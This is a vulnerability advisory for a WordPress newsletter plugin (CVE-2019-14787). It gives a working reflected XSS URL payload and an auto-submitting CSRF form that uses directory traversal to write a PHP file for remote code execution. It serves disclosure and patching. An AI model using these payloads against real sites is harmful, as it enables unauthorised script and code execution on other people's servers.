Newsletter Lite < 4.6.19 – Multiple Issues | CVE 2019-14787

Description

- Lack of CSRF, Authorisation and sanitisation checks in the ajax_load_new_editor() function, registered as an AJAX method, can lead to an authenticated reflected XSS issue.

- Authenticated Directory Traversal leading to RCE

Proof of Concept

XSS: As an authenticated user (with a role as low as a Subscriber), open https://<BLOG>/wp-admin/admin-ajax.php?action=newsletters_load_new_editor&contentarea="><svg/onload=alert(/XSS/)>


RCE: Save the below code in an HTML file, then open it when logged in (with a role as low as Subscriber).

<html>
  <body onload="document.forms[0].submit()";>
    <form action="https://<BLOG>/wp-admin/admin-ajax.php?action=newsletters_exportmultiple&exportfile=../../nl_rce.php" method="POST">
      <input type="hidden" name="headings[0][0]" value=""/>
      <input type="hidden" name="subscribers[0][0]" value="<?php echo('Authenticated RCE'); ?>"/>
    </form>
  </body>
</html>

Then, the PHP file will be at https://<BLOG>/wp-content/uploads/nl_rce.php